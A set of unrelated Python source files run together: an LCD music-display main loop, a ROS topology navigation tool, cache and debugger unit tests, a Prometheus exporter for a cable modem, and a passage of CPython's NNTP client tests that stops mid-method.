logging.error("Uncaught exception", exc_info=(exc_type, exc_value, exc_traceback))
try:
if len(mc.musicdata) > 0:
logging.error("Player status at exception")
logging.error(str(mc.musicdata))
except NameError:
# If this gets called before the music controller is instantiated, ignore it
pass
sys.__excepthook__(exc_type, exc_value, exc_traceback)
sys.excepthook = handleuncaughtexceptions
# Suppress MPD libraries INFO messages
loggingMPD = logging.getLogger("mpd")
loggingMPD.setLevel( logging.WARN )
loggingPIL = logging.getLogger('PIL')
loggingPIL.setLevel( logging.WARN )
try:
opts, args = getopt.getopt(sys.argv[1:],"hd:",["driver=","devicetype=","width=","height=","rs=","e=","d4=","d5=","d6=","d7=","i2caddress=","i2cport=","enable=","wapi=", "wlocale=", "timezone=", "time24hour", "temperature=", "lms","mpd","spop","rune","volumio","pages=", "lmsplayer=", "showupdates"])  # include -h, --enable and --time24hour, which are handled below
except getopt.GetoptError:
print ('pydPiper.py -d <driver> --devicetype <devicetype (for LUMA devices)> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates')
sys.exit(2)
services_list = [ ]
driver = ''
devicetype = ''
showupdates = False
pagefile = 'pages.py'
pin_rs = pydPiper_config.DISPLAY_PIN_RS
pin_e = pydPiper_config.DISPLAY_PIN_E
[pin_d4, pin_d5, pin_d6, pin_d7] = pydPiper_config.DISPLAY_PINS_DATA
rows = pydPiper_config.DISPLAY_HEIGHT
cols = pydPiper_config.DISPLAY_WIDTH
i2c_address = pydPiper_config.DISPLAY_I2C_ADDRESS
i2c_port = pydPiper_config.DISPLAY_I2C_PORT
enable = pydPiper_config.DISPLAY_ENABLE_DURATION
driver = pydPiper_config.DISPLAY_DRIVER
pagefile = pydPiper_config.PAGEFILE
services_list.append(pydPiper_config.MUSIC_SERVICE)
for opt, arg in opts:
if opt == '-h':
print ('pydPiper.py -d <driver> --devicetype <devicetype e.g. ssd1306, sh1106> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --enable <enable duration> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates')
sys.exit()
elif opt in ("-d", "--driver"):
driver = arg
elif opt in ("--devicetype"):
devicetype = arg
elif opt in ("--rs"):
pin_rs = int(arg)
elif opt in ("--e"):
pin_e = int(arg)
elif opt in ("--d4"):
pin_d4 = int(arg)
elif opt in ("--d5"):
pin_d5 = int(arg)
elif opt in ("--d6"):
pin_d6 = int(arg)
elif opt in ("--d7"):
pin_d7 = int(arg)
elif opt in ("--i2caddress"):
i2c_address = int(arg,0)
elif opt in ("--i2cport"):
i2c_port = int(arg,0)
elif opt in ("--width"):
cols = int(arg,0)
elif opt in ("--height"):
rows = int(arg,0)
elif opt in ("--enable"):
enable = int(arg)
elif opt in ("--wapi"):
pydPiper_config.WUNDER_API = arg
elif opt in ("--wlocale"):
pydPiper_config.WUNDER_LOCATION = arg
elif opt in ("--timezone"):
pydPiper_config.TIMEZONE = arg
elif opt in (u"--time24hour"):
pydPiper_config.TIME24HOUR = True
elif opt in ("--temperature"):
pydPiper_config.TEMPERATURE = arg
elif opt in ("--mpd"):
services_list.append('mpd')
elif opt in ("--spop"):
services_list.append('spop')
elif opt in ("--lms"):
services_list.append('lms')
elif opt in ("--lmsplayer"):
pydPiper_config.LMS_PLAYER = arg
elif opt in ("--rune"):
services_list.append('rune')
elif opt in ("--volumio"):
services_list.append('volumio')
elif opt in ("--pages"):
pagefile = arg
# print u"Loading {0} as page file".format(arg)
# If page file provided, try to load provided file on top of default pages file
# try:
# newpages = imp.load_source(u'pages', arg)
# if validpages(newpages):
# pages = newpages
# else:
# print u"Invalid page file provided. Using default pages."
# except IOError:
# # Page file not found
# print u"Page file {0} not found. Using default pages".format(arg)
elif opt in ("--showupdates"):
showupdates = True
pydPiper_config.DISPLAY_SIZE = (cols, rows)
pins_data = [pin_d4, pin_d5, pin_d6, pin_d7]
if len(services_list) == 0:
logging.critical("Must have at least one music service to monitor")
sys.exit()
logging.info('pydPiper starting')
dq = queue.Queue()
# Choose display
if not driver:
try:
driver = pydPiper_config.DISPLAY_DRIVER
except:
driver = ''
if not devicetype:
try:
devicetype = pydPiper_config.DISPLAY_DEVICETYPE
except:
devicetype = ''
if driver == "winstar_weg":
lcd = displays.winstar_weg.winstar_weg(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == "hd44780":
lcd = displays.hd44780.hd44780(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == "hd44780_i2c":
lcd = displays.hd44780_i2c.hd44780_i2c(rows, cols, i2c_address, i2c_port, enable)
elif driver == "hd44780_mcp23008":
lcd = displays.hd44780_i2c.hd44780_mcp23008(rows, cols, i2c_address, i2c_port, enable)
elif driver == "ssd1306_i2c":
lcd = displays.ssd1306_i2c.ssd1306_i2c(rows, cols, i2c_address, i2c_port)
elif driver == "luma_i2c":
lcd = displays.luma_i2c.luma_i2c(rows, cols, i2c_address, i2c_port, devicetype)
elif driver == "lcd_curses":
lcd = displays.lcd_curses.lcd_curses(rows, cols)
else:
logging.critical("No valid display found")
sys.exit()
lcd.clear()
logging.debug('Loading display controller')
dc = displays.display.display_controller(pydPiper_config.DISPLAY_SIZE)
logging.debug('Loading music controller')
mc = music_controller(services_list, dc, showupdates)
time.sleep(2)
mc.start()
dc.load(pagefile, mc.musicdata,mc.musicdata_prev )
try:
while True:
# Get next image and send it to the display every .1 seconds
with mc.musicdata_lock:
img = next(dc)
# displays.graphics.update(img)
lcd.update(img)
time.sleep(pydPiper_config.ANIMATION_SMOOTHING)
except KeyboardInterrupt:
pass
finally:
print ("Shutting down threads")
exitapp[0] = True
try:
lcd.clear()
lcd.message("Exiting...")
time.sleep(3)
lcd.clear()
lcd.cleanup()
except:
pass
mc.join()
logging.info("Exiting...")
|
topologyGoal.py
|
# Copyright 2021 CLOBOT Co. Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
from geometry_msgs.msg import PointStamped,Point
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import PoseStamped
from rospkg.rospack import RosPack
from visualization_msgs.msg import Marker, MarkerArray
from clobot_msgs.msg import NavigationStatus
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import json
import threading
import sys
import math
class TopologyGoal:
def __init__(self, f_name):
pack = RosPack()
self.nodefile = pack.get_path("clober_tools")+"/topology/"+f_name+".json"
self.topology = {"Map":"","Node":[],"Link":[]}
self.pose = [0]*3
self.cmdType = None
self.goalNode = None
self.goalList = None
self.goalIdx = 0
## publisher ##
self.goalPub = rospy.Publisher("/goal", PoseStamped, queue_size=1)
self.nodePub = rospy.Publisher('/topology/nodes', MarkerArray, queue_size=1)
self.linkPub = rospy.Publisher('/topology/links', MarkerArray, queue_size=1)
## subscriber ##
rospy.Subscriber("/cmb/status", NavigationStatus, self.navCB)
def sendGoal(self):
if self.cmdType == "node":
nodeId = self.goalNode
elif self.cmdType == "path":
if self.goalIdx >= len(self.goalList):
print("path navigation finished")
return
nodeId = self.goalList[self.goalIdx]
else:
print("cmdType is not defined")
return
goal = PoseStamped()
value = self.findTopologyIdx(nodeId)
if value == -1:
print("node Id : ",nodeId," not exist")
else:
goal.pose.position.x = self.topology["Node"][value]["Position"]["x"]
goal.pose.position.y = self.topology["Node"][value]["Position"]["y"]
if self.cmdType == "node":
goal.pose.orientation.x = self.topology["Node"][value]["Orientation"]["x"]
goal.pose.orientation.y = self.topology["Node"][value]["Orientation"]["y"]
goal.pose.orientation.z = self.topology["Node"][value]["Orientation"]["z"]
goal.pose.orientation.w = self.topology["Node"][value]["Orientation"]["w"]
elif self.cmdType == "path":
if self.goalIdx == len(self.goalList)-1:
goal.pose.orientation.x = self.topology["Node"][value]["Orientation"]["x"]
goal.pose.orientation.y = self.topology["Node"][value]["Orientation"]["y"]
goal.pose.orientation.z = self.topology["Node"][value]["Orientation"]["z"]
goal.pose.orientation.w = self.topology["Node"][value]["Orientation"]["w"]
else:
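# Intermediate waypoint: face the next node in the path by computing the heading
# from this node to the next and converting it to a quaternion.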
next_goal_id = self.goalList[self.goalIdx+1]
next_goal_idx = self.findTopologyIdx(next_goal_id)
next_goal_x = self.topology["Node"][next_goal_idx]["Position"]["x"]
next_goal_y = self.topology["Node"][next_goal_idx]["Position"]["y"]
yaw_rad = math.atan2(next_goal_y-goal.pose.position.y, next_goal_x-goal.pose.position.x)
quat = self.getQuaternion(0.0,0.0,yaw_rad)
goal.pose.orientation.x = quat[0]
goal.pose.orientation.y = quat[1]
goal.pose.orientation.z = quat[2]
goal.pose.orientation.w = quat[3]
else:
pass
self.goalPub.publish(goal)
print("send goal Id : ",nodeId)
return
def findTopologyIdx(self,nodeId):
for i in range(len(self.topology["Node"])):
if self.topology["Node"][i]["ID"] == nodeId:
return i
return -1
def getYaw(self,q):
q_list = [q.x,q.y,q.z,q.w]
(roll, pitch, yaw) = euler_from_quaternion(q_list)
return yaw
def getQuaternion(self,roll,pitch,yaw):
quat = quaternion_from_euler(roll,pitch,yaw)
return quat
def navCB(self,msg):
if msg.status == NavigationStatus.STATUS_REACHED:
if self.cmdType == "path":
print("send next goal")
self.goalIdx += 1
self.sendGoal()
def checkId(self,nodeId):
for i in range(len(self.topology["Node"])):
if self.topology["Node"][i]["ID"] == nodeId:
return True
return False
def getTopologyfromFile(self):
try:
print(self.nodefile)
with open(self.nodefile, "rt") as f:
self.topology = json.load(f)
print(self.nodefile + " already exists... using it!")
except Exception as e:
print('new file is created ', e)
def setTopologyToFile(self):
try:
with open(self.nodefile, "wt") as f:
json.dump(self.topology, f, indent=4)
except Exception as e:
print('error', e)
def jsonload(self):
self.getTopologyfromFile()
def showNode(self):
self.getTopologyfromFile()
markerArray = MarkerArray()
for i in range(len(self.topology["Node"])):
marker = Marker()
marker.header.frame_id = 'map'
marker.header.stamp = rospy.Time()
marker.id = i
marker.type = marker.SPHERE
marker.action = marker.ADD
marker.pose.position.x = self.topology["Node"][i]["Position"]["x"]
marker.pose.position.y = self.topology["Node"][i]["Position"]["y"]
marker.scale.x = 0.2
marker.scale.y = 0.2
marker.scale.z = 0.2
marker.color.a = 1.0
marker.color.r = 1.0
marker.color.g = 0.0
marker.color.b = 0.0
name_marker = Marker()
name_marker.header.frame_id = 'map'
name_marker.header.stamp = rospy.Time()
name_marker.id = i+2000
name_marker.type = Marker.TEXT_VIEW_FACING
name_marker.scale.z = 0.3
name_marker.text = self.topology["Node"][i]["ID"]
name_marker.color.a = 1.0
name_marker.color.r = 0.0
name_marker.color.g = 0.0
name_marker.color.b = 0.0
name_marker.pose.position.x = self.topology["Node"][i]["Position"]["x"]+0.3
name_marker.pose.position.y = self.topology["Node"][i]["Position"]["y"]+0.3
markerArray.markers.append(marker)
markerArray.markers.append(name_marker)
self.nodePub.publish(markerArray)
def showLink(self):
self.getTopologyfromFile()
markerArray = MarkerArray()
for i in range(len(self.topology["Link"])):
marker = Marker()
s_node = self.topology["Link"][i]["Connected"][0]
e_node = self.topology["Link"][i]["Connected"][1]
print(s_node)
print(e_node)
start_point = Point()
for j in range(len(self.topology["Node"])):
if s_node == self.topology["Node"][j]["ID"] :
start_point.x = self.topology["Node"][j]["Position"]["x"]
start_point.y = self.topology["Node"][j]["Position"]["y"]
break
end_point = Point()
for j in range(len(self.topology["Node"])):
if e_node == self.topology["Node"][j]["ID"] :
end_point.x = self.topology["Node"][j]["Position"]["x"]
end_point.y = self.topology["Node"][j]["Position"]["y"]
break
marker.header.frame_id = 'map'
marker.id = i
marker.type = marker.LINE_STRIP
marker.scale.x = 0.1
marker.scale.y = 0.1
marker.scale.z = 0.1
marker.points.append(start_point)
marker.points.append(end_point)
marker.color.a = 1.0
marker.color.r = 0.0
marker.color.g = 0.0
marker.color.b = 1.0
name_marker = Marker()
name_marker.header.frame_id = 'map'
name_marker.header.stamp = rospy.Time()
name_marker.id = i+2000
name_marker.type = Marker.TEXT_VIEW_FACING
name_marker.scale.z = 0.3
name_marker.text = self.topology["Link"][i]["ID"]
name_marker.color.a = 1.0
name_marker.color.r = 0.0
name_marker.color.g = 0.0
name_marker.color.b = 0.0
name_marker.pose.position.x = (start_point.x+end_point.x)/2 - 0.4
name_marker.pose.position.y = (start_point.y+end_point.y)/2
markerArray.markers.append(marker)
markerArray.markers.append(name_marker)
self.linkPub.publish(markerArray)
def main(filename):
try:
rospy.init_node("topology_goal_node", anonymous=True)
writer = TopologyGoal(filename)
t = threading.Thread(target=rospy.spin)
t.daemon = True
t.start()
""" print usage """
print("*********** Use key input ***********")
print("q : quit")
print("load : load file")
print("node : set goal from topology nodes")
print("path : set path from topology nodes")
print("go : send goal by node or path")
print("v : show nodes")
print("*******************")
while not rospy.is_shutdown():
try:
cmd = input("input : ")
if cmd == 'q':
break
elif cmd == 'node':
name = input("node name : ")
writer.cmdType = 'node'
if writer.checkId(name):
writer.goalNode = name
print("set goal node : ",name)
elif cmd == 'path':
path = []
writer.cmdType = 'path'
writer.goalIdx = 0
while True:
name = input("path node name (press 'f' if finish) : ")
if writer.checkId(name):
path.append(name)
print("set goal path : ",path)
if name == 'f':
break
writer.goalList = path
elif cmd == 'go':
writer.sendGoal()
elif cmd == 'load':
writer.jsonload()
elif cmd == 'v':
writer.showNode()
writer.showLink()
except ValueError:
print("value error")
except KeyboardInterrupt:
print("shutting down")
if __name__ == "__main__":
if len(sys.argv) != 2 :
print("use... 'python topologyWriter.py filename'")
exit(0)
main(sys.argv[1])
|
test_caching.py
|
#!/usr/bin/env python3
import threading
import time
from typing import Optional
import pytest
from anchore_engine.subsys.caching import (
TTLCache,
local_named_cache,
thread_local_cache,
)
@pytest.fixture
def ttl_cache(request):
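# request.param is the TTL passed in by the tests via indirect parametrization.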
cache: TTLCache = TTLCache()
value: str = "test_value"
cache.cache_it("test_key", value, request.param)
return cache
class TestTTLCache:
@pytest.mark.parametrize(
"ttl_cache, sleep_time, expected_type",
[
(None, 0, str),
(-1, 0, str),
(1, 1, type(None)),
(0, 0, type(None)),
],
indirect=["ttl_cache"],
)
def test_cache(self, ttl_cache, sleep_time, expected_type):
time.sleep(sleep_time)
cached: Optional[str] = ttl_cache.lookup("test_key")
assert isinstance(cached, expected_type)
if expected_type != type(None):
assert id(cached) == id("test_value")
@pytest.mark.parametrize("ttl_cache", [(None)], indirect=["ttl_cache"])
def test_cache_flush(self, ttl_cache):
ttl_cache.flush()
cached: Optional[str] = ttl_cache.lookup("test_key")
assert isinstance(cached, type(None))
@pytest.mark.parametrize("ttl_cache", [(None)], indirect=["ttl_cache"])
def test_cache_delete(self, ttl_cache):
ttl_cache.delete("test_key")
cached: Optional[str] = ttl_cache.lookup("test_key")
assert isinstance(cached, type(None))
class TestLocalCaches:
def test_threadlocal_singleton(self):
cache: threading.local = thread_local_cache()
cache2: threading.local = thread_local_cache()
assert id(cache) == id(cache2)
def test_threadlocal_has_cache(self):
cache: threading.local = thread_local_cache()
assert hasattr(cache, "general")
assert isinstance(cache.general, TTLCache)
def test_localnamed_has_name(self):
cache: TTLCache = local_named_cache("mycache")
tlocal: threading.local = thread_local_cache()
assert isinstance(cache, TTLCache)
assert hasattr(tlocal, "mycache")
def test_threadlocal_is_thread_local(self):
thread_cache_id: Optional[int] = None
def thread_func():
nonlocal thread_cache_id
thread_cache_id = id(thread_local_cache().general)
t1: threading.Thread = threading.Thread(target=thread_func)
t1.start()
t1.join()
main_cache_id: int = id(thread_local_cache().general)
assert main_cache_id != thread_cache_id
|
test_frame_evaluator.py
|
import sys
import threading
import pytest
from pydev_tests_python.debugger_unittest import IS_PY36_OR_GREATER, IS_CPYTHON
from pydev_tests_python.debug_constants import TEST_CYTHON
pytestmark = pytest.mark.skipif(not IS_PY36_OR_GREATER or not IS_CPYTHON or not TEST_CYTHON, reason='Requires CPython >= 3.6')
def get_foo_frame():
frame = sys._getframe()
return frame
class CheckClass(object):
def collect_info(self):
from _pydevd_frame_eval import pydevd_frame_evaluator
thread_info = pydevd_frame_evaluator.get_thread_info_py()
self.thread_info = thread_info
@pytest.mark.parametrize('_times', range(2))
def test_thread_info(_times):
obj = CheckClass()
obj.collect_info()
assert obj.thread_info.additional_info is not None
assert not obj.thread_info.is_pydevd_thread
thread_info = obj.thread_info
obj.collect_info()
assert obj.thread_info is thread_info
obj = CheckClass()
t = threading.Thread(target=obj.collect_info)
t.is_pydev_daemon_thread = True
t.start()
t.join()
assert obj.thread_info.additional_info is None
assert obj.thread_info.is_pydevd_thread
def method():
pass
@pytest.fixture
def _custom_global_dbg():
from _pydevd_bundle.pydevd_constants import GlobalDebuggerHolder
from pydevd import PyDB
curr = GlobalDebuggerHolder.global_dbg
PyDB() # Will make itself current
yield
GlobalDebuggerHolder.global_dbg = curr
@pytest.mark.parametrize('_times', range(2))
def test_func_code_info(_times, _custom_global_dbg):
from _pydevd_frame_eval import pydevd_frame_evaluator
# Must be called before get_func_code_info_py to initialize the _code_extra_index.
pydevd_frame_evaluator.get_thread_info_py()
func_info = pydevd_frame_evaluator.get_func_code_info_py(method.__code__)
assert func_info.co_filename is method.__code__.co_filename
func_info2 = pydevd_frame_evaluator.get_func_code_info_py(method.__code__)
assert func_info is func_info2
some_func = eval('lambda:0')
func_info3 = pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__)
del some_func
del func_info3
some_func = eval('lambda:0')
pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__)
func_info = pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__)
assert pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__) is func_info
|
connectbox_exporter.py
|
import json
import logging
import threading
import time
from http.server import HTTPServer
from socketserver import ThreadingMixIn
from typing import Dict
import click
import compal
from lxml.etree import XMLSyntaxError
from prometheus_client import CollectorRegistry, MetricsHandler
from prometheus_client.metrics_core import GaugeMetricFamily
from requests import Timeout
from connectbox_exporter.config import (
load_config,
IP_ADDRESS,
PASSWORD,
EXPORTER,
PORT,
TIMEOUT_SECONDS,
EXTRACTORS,
)
from connectbox_exporter.logger import get_logger, VerboseLogger
from connectbox_exporter.xml2metric import get_metrics_extractor
# Taken 1:1 from prometheus-client==0.7.1, see https://github.com/prometheus/client_python/blob/3cb4c9247f3f08dfbe650b6bdf1f53aa5f6683c1/prometheus_client/exposition.py
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
# Enabling daemon threads virtually makes ``_ThreadingSimpleServer`` the
# same as Python 3.7's ``ThreadingHTTPServer``.
daemon_threads = True
class ConnectBoxCollector(object):
def __init__(
self,
logger: VerboseLogger,
ip_address: str,
password: str,
exporter_config: Dict,
):
self.logger = logger
self.ip_address = ip_address
self.password = password
self.timeout = exporter_config[TIMEOUT_SECONDS]
extractors = exporter_config[EXTRACTORS]
self.metric_extractors = [get_metrics_extractor(e, logger) for e in extractors]
def collect(self):
# Collect scrape duration and scrape success for each extractor. Scrape success is initialized with False for
# all extractors so that we can report a value for each extractor even in cases where we abort midway through
# because we lost connection to the modem.
scrape_duration = {} # type: Dict[str, float]
scrape_success = {e.name: False for e in self.metric_extractors}
# attempt login
login_logout_success = True
try:
self.logger.debug("Logging in at " + self.ip_address)
connectbox = compal.Compal(
self.ip_address, key=self.password, timeout=self.timeout
)
connectbox.login()
except (ConnectionError, Timeout, ValueError) as e:
self.logger.error(repr(e))
connectbox = None
login_logout_success = False
# skip extracting further metrics if login failed
if connectbox is not None:
for extractor in self.metric_extractors:
raw_xmls = {}
try:
pre_scrape_time = time.time()
# obtain all raw XML responses for an extractor, then extract metrics
for fun in extractor.functions:
self.logger.debug(f"Querying fun={fun}...")
raw_xml = connectbox.xml_getter(fun, {}).content
self.logger.verbose(
f"Raw XML response for fun={fun}:\n{raw_xml.decode()}"
)
raw_xmls[fun] = raw_xml
yield from extractor.extract(raw_xmls)
post_scrape_time = time.time()
scrape_duration[extractor.name] = post_scrape_time - pre_scrape_time
scrape_success[extractor.name] = True
except (XMLSyntaxError, AttributeError) as e:
# in case of a less serious error, log and continue scraping the next extractor
jsonized = json.dumps(raw_xmls)
message = f"Failed to extract '{extractor.name}'. Please open an issue on Github and include the following:\n{repr(e)}\n{jsonized}"
self.logger.error(message)
except (ConnectionError, Timeout) as e:
# in case of serious connection issues, abort and do not try the next extractor
self.logger.error(repr(e))
break
# attempt logout once done
try:
self.logger.debug("Logging out.")
connectbox.logout()
except Exception as e:
self.logger.error(e)
login_logout_success = False
scrape_success["login_logout"] = int(login_logout_success)
        # create metrics from the previously collected durations and successes
EXTRACTOR = "extractor"
scrape_duration_metric = GaugeMetricFamily(
"connectbox_scrape_duration",
documentation="Scrape duration by extractor",
unit="seconds",
labels=[EXTRACTOR],
)
for name, duration in scrape_duration.items():
scrape_duration_metric.add_metric([name], duration)
yield scrape_duration_metric
scrape_success_metric = GaugeMetricFamily(
"connectbox_up",
documentation="Connect Box exporter scrape success by extractor",
labels=[EXTRACTOR],
)
for name, success in scrape_success.items():
scrape_success_metric.add_metric([name], int(success))
yield scrape_success_metric
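# ConnectBoxCollector follows the prometheus_client custom-collector convention: the
# registry invokes collect() on every scrape, so the metric families yielded above are
# rebuilt from the modem's XML responses each time the exporter is queried.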
@click.command()
@click.argument("config_file", type=click.Path(exists=True, dir_okay=False))
@click.option(
"-v",
"--verbose",
help="Log more messages. Multiple -v increase verbosity.",
count=True,
)
def main(config_file, verbose):
"""
Launch the exporter using a YAML config file.
"""
# hush the logger from the compal library and use our own custom logger
compal.LOGGER.setLevel(logging.WARNING)
logger = get_logger(verbose)
    # load user config and merge with defaults
config = load_config(config_file)
exporter_config = config[EXPORTER]
# fire up collector
reg = CollectorRegistry()
reg.register(
ConnectBoxCollector(
logger,
ip_address=config[IP_ADDRESS],
password=config[PASSWORD],
exporter_config=config[EXPORTER],
)
)
# start http server
CustomMetricsHandler = MetricsHandler.factory(reg)
httpd = _ThreadingSimpleServer(("", exporter_config[PORT]), CustomMetricsHandler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.start()
logger.info(
f"Exporter running at http://localhost:{exporter_config[PORT]}, querying {config[IP_ADDRESS]}"
)
# wait indefinitely
try:
while True:
time.sleep(3)
except KeyboardInterrupt:
httpd.shutdown()
httpd_thread.join()
|
test_nntplib.py
|
import io
import socket
import datetime
import textwrap
import unittest
import functools
import contextlib
import os.path
import re
import threading
from test import support
from nntplib import NNTP, GroupInfo
import nntplib
from unittest.mock import patch
try:
import ssl
except ImportError:
ssl = None
TIMEOUT = 30
certfile = os.path.join(os.path.dirname(__file__), 'keycert3.pem')
if ssl is not None:
SSLError = ssl.SSLError
else:
class SSLError(Exception):
"""Non-existent exception class when we lack SSL support."""
reason = "This will never be raised."
# TODO:
# - test the `file` arg to more commands
# - test error conditions
# - test auth and `usenetrc`
class NetworkedNNTPTestsMixin:
def test_welcome(self):
welcome = self.server.getwelcome()
self.assertEqual(str, type(welcome))
def test_help(self):
resp, lines = self.server.help()
self.assertTrue(resp.startswith("100 "), resp)
for line in lines:
self.assertEqual(str, type(line))
def test_list(self):
resp, groups = self.server.list()
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_list_active(self):
resp, groups = self.server.list(self.GROUP_PAT)
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_unknown_command(self):
with self.assertRaises(nntplib.NNTPPermanentError) as cm:
self.server._shortcmd("XYZZY")
resp = cm.exception.response
self.assertTrue(resp.startswith("500 "), resp)
def test_newgroups(self):
# gmane gets a constant influx of new groups. In order not to stress
# the server too much, we choose a recent date in the past.
dt = datetime.date.today() - datetime.timedelta(days=7)
resp, groups = self.server.newgroups(dt)
if len(groups) > 0:
self.assertIsInstance(groups[0], GroupInfo)
self.assertIsInstance(groups[0].group, str)
def test_description(self):
def _check_desc(desc):
# Sanity checks
self.assertIsInstance(desc, str)
self.assertNotIn(self.GROUP_NAME, desc)
desc = self.server.description(self.GROUP_NAME)
_check_desc(desc)
# Another sanity check
self.assertIn("Python", desc)
# With a pattern
desc = self.server.description(self.GROUP_PAT)
_check_desc(desc)
# Shouldn't exist
desc = self.server.description("zk.brrtt.baz")
self.assertEqual(desc, '')
def test_descriptions(self):
resp, descs = self.server.descriptions(self.GROUP_PAT)
# 215 for LIST NEWSGROUPS, 282 for XGTITLE
self.assertTrue(
resp.startswith("215 ") or resp.startswith("282 "), resp)
self.assertIsInstance(descs, dict)
desc = descs[self.GROUP_NAME]
self.assertEqual(desc, self.server.description(self.GROUP_NAME))
def test_group(self):
result = self.server.group(self.GROUP_NAME)
self.assertEqual(5, len(result))
resp, count, first, last, group = result
self.assertEqual(group, self.GROUP_NAME)
self.assertIsInstance(count, int)
self.assertIsInstance(first, int)
self.assertIsInstance(last, int)
self.assertLessEqual(first, last)
self.assertTrue(resp.startswith("211 "), resp)
def test_date(self):
resp, date = self.server.date()
self.assertIsInstance(date, datetime.datetime)
# Sanity check
self.assertGreaterEqual(date.year, 1995)
self.assertLessEqual(date.year, 2030)
def _check_art_dict(self, art_dict):
# Some sanity checks for a field dictionary returned by OVER / XOVER
self.assertIsInstance(art_dict, dict)
# NNTP has 7 mandatory fields
self.assertGreaterEqual(art_dict.keys(),
{"subject", "from", "date", "message-id",
"references", ":bytes", ":lines"}
)
for v in art_dict.values():
self.assertIsInstance(v, (str, type(None)))
def test_xover(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xover(last - 5, last)
if len(lines) == 0:
self.skipTest("no articles retrieved")
# The 'last' article is not necessarily part of the output (cancelled?)
art_num, art_dict = lines[0]
self.assertGreaterEqual(art_num, last - 5)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
@unittest.skipIf(True, 'temporarily skipped until a permanent solution'
' is found for issue #28971')
def test_over(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
start = last - 10
# The "start-" article range form
resp, lines = self.server.over((start, None))
art_num, art_dict = lines[0]
self._check_art_dict(art_dict)
# The "start-end" article range form
resp, lines = self.server.over((start, last))
art_num, art_dict = lines[-1]
# The 'last' article is not necessarily part of the output (cancelled?)
self.assertGreaterEqual(art_num, start)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
# XXX The "message_id" form is unsupported by gmane
# 503 Overview by message-ID unsupported
def test_xhdr(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xhdr('subject', last)
for line in lines:
self.assertEqual(str, type(line[1]))
def check_article_resp(self, resp, article, art_num=None):
self.assertIsInstance(article, nntplib.ArticleInfo)
if art_num is not None:
self.assertEqual(article.number, art_num)
for line in article.lines:
self.assertIsInstance(line, bytes)
# XXX this could exceptionally happen...
self.assertNotIn(article.lines[-1], (b".", b".\n", b".\r\n"))
@unittest.skipIf(True, "FIXME: see bpo-32128")
def test_article_head_body(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
# Try to find an available article
for art_num in (last, first, last - 1):
try:
resp, head = self.server.head(art_num)
except nntplib.NNTPTemporaryError as e:
if not e.response.startswith("423 "):
raise
# "423 No such article" => choose another one
continue
break
else:
self.skipTest("could not find a suitable article number")
self.assertTrue(resp.startswith("221 "), resp)
self.check_article_resp(resp, head, art_num)
resp, body = self.server.body(art_num)
self.assertTrue(resp.startswith("222 "), resp)
self.check_article_resp(resp, body, art_num)
resp, article = self.server.article(art_num)
self.assertTrue(resp.startswith("220 "), resp)
self.check_article_resp(resp, article, art_num)
# Tolerate running the tests from behind a NNTP virus checker
blacklist = lambda line: line.startswith(b'X-Antivirus')
filtered_head_lines = [line for line in head.lines
if not blacklist(line)]
filtered_lines = [line for line in article.lines
if not blacklist(line)]
self.assertEqual(filtered_lines, filtered_head_lines + [b''] + body.lines)
def test_capabilities(self):
# The server under test implements NNTP version 2 and has a
# couple of well-known capabilities. Just sanity check that we
# got them.
def _check_caps(caps):
caps_list = caps['LIST']
self.assertIsInstance(caps_list, (list, tuple))
self.assertIn('OVERVIEW.FMT', caps_list)
self.assertGreaterEqual(self.server.nntp_version, 2)
_check_caps(self.server.getcapabilities())
# This re-emits the command
resp, caps = self.server.capabilities()
_check_caps(caps)
def test_zlogin(self):
# This test must be the penultimate because further commands will be
# refused.
baduser = "notarealuser"
badpw = "notarealpassword"
# Check that bogus credentials cause failure
self.assertRaises(nntplib.NNTPError, self.server.login,
user=baduser, password=badpw, usenetrc=False)
# FIXME: We should check that correct credentials succeed, but that
# would require valid details for some server somewhere to be in the
# test suite, I think. Gmane is anonymous, at least as used for the
# other tests.
def test_zzquit(self):
# This test must be called last, hence the name
cls = type(self)
try:
self.server.quit()
finally:
cls.server = None
@classmethod
def wrap_methods(cls):
# Wrap all methods in a transient_internet() exception catcher
# XXX put a generic version in test.support?
